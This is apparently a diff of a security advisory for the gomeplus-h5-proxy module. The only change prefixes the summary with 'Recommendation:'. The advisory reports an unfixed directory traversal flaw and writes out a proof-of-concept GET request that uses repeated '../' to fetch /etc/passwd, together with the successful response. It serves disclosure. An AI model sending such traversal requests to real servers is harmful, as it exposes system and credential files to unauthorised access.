dilanbhalla/security-advisories/reviews/gomeplus-h5-proxy-350.md

 SPDX-License-Identifier: CC-BY-4.0
 ---
 ### Summary
-*Directory Traversal*<br><br>Because there is no fix for this module, we suggest using a different one.
+*Directory Traversal*<br><br>Recommendation: Because there is no fix for this module, we suggest using a different one.
 ### Details
 `gomeplus-h5-proxy` is vulnerable to a directory traversal issue, allowing attackers to access any file in the system by placing '../' in the URL.
 Example request: ``` GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 host: localhost ``` and response: ``` HTTP/1.1 200 OK Access-Control-Allow-Origin: * Date: Mon, 22 May 2017 21:29:51 GMT Connection: keep-alive Transfer-Encoding: chunked  {contents of /etc/passwd} ```
 <br><br>• Affected Versions: <99.999.9999